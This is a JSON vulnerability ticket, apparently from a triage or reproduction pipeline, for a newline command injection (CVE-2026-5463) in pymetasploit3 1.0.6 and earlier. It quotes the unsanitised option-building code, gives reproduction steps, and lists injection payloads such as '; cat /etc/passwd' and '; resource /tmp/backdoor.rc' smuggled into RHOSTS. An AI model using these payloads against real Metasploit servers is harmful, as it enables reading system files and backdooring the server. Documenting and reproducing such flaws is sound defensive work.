{
  "claim": {
    "argus_claim_ref": null,
    "attacker_control": null,
    "claimed_surface": "library_api",
    "expected_impact": "dos",
    "finding_id": null,
    "id": null,
    "required_entrypoint_detail": null,
    "required_entrypoint_kind": "authenticate",
    "submission_reason": "ticket_derived",
    "trigger_class": null,
    "upstream_verdicts": null
  },
  "latest_description": "CRITICAL COMMAND INJECTION - CVE-2026-5463 pymetasploit3 <= 1.0.6\n\n## VULNERABILITY SUMMARY\nUnauthenticated remote attackers can inject arbitrary commands into Metasploit console via newline injection in module options.\n\n## ROOT CAUSE ANALYSIS\nThe run_module_with_output() function in pymetasploit3/msfrpc.py builds Metasploit console commands unsafely:\n\nVULNERABLE CODE (v1.0.6 and earlier):\nfor k in opts.keys():\n    options_str += 'set {} {}\\n'.format(k, opts[k])  # NO SANITIZATION\n\nWhen user-controlled option values (like RHOSTS) contain newlines, they break command structure:\n\nset RHOSTS 192.168.1.1\\n; cat /etc/passwd\\n\nThis terminates the set command and injects arbitrary Metasploit console commands.\n\n## EXPLOITATION PATH\n1. Install pymetasploit3 1.0.6: pip install pymetasploit3==1.0.6\n2. Connect to Metasploit RPC (requires msfrpcd running)\n3. Create exploit module with malicious option:\n   console.run_module_with_output(exploit, options={'RHOSTS': '192.168.1.1\\n; cat /etc/passwd\\n'})\n4. Newline breaks command parsing, executes cat /etc/passwd\n\n## PROOF OF CONCEPT (PAYLOAD)\nInject via any module option like RHOSTS, RPORT, etc.:\n- 192.168.1.1\\n; id - Execute id command\n- 192.168.1.1\\n; workspace -a pwned - Create workspace\n- 192.168.1.1\\n; resource /tmp/backdoor.rc - Load resource file\n\n## SUCCESS CRITERIA\nPROVE command injection (not just error/crash)\nFAILURE: Script errors or connection issues\nSUCCESS: Demonstrate arbitrary command execution within Metasploit console context\n\n## IMPACT\n- Unauthenticated command injection into Metasploit framework\n- Session manipulation\n- Lateral movement\n- Full compromise of Metasploit server\n\n## BLAST RADIUS\n- 406 GitHub stars\n- PyPI package: pip install pymetasploit3\n- Used by penetration testers and red teams\n- Affects all pymetasploit3 <= 1.0.6\n\n## TECHNICAL DETAILS\n- CWE: CWE-77 (Command Injection)\n- CVSS 4.0: 9.3 CRITICAL\n- CVSS 3.1: 8.6 HIGH\n- Affected: versions through 1.0.6\n- Fixed: version 1.0.7+\n\n## REPOSITORY\nhttps://github.com/DanMcInerney/pymetasploit3\n\n## REQUIRED FOR REPRO\n- Python 3.x\n- Metasploit with msfrpcd running\n- pip install pymetasploit3==1.0.6\n\n## REFERENCES\n- https://nvd.nist.gov/vuln/detail/CVE-2026-5463\n- https://github.com/DanMcInerney/pymetasploit3\n- https://dbugs.ptsecurity.com/vulnerability/PT-2026-29988\n\n## PATCH DETAILS\nFixed in 1.0.7 by sanitizing newlines in option values before command construction.",
  "product": "pymetasploit3",
  "severity": "critical",
  "status": "open",
  "summary": "pymetasploit3 command injection",
  "ticket_id": "CVE-2026-5463"
}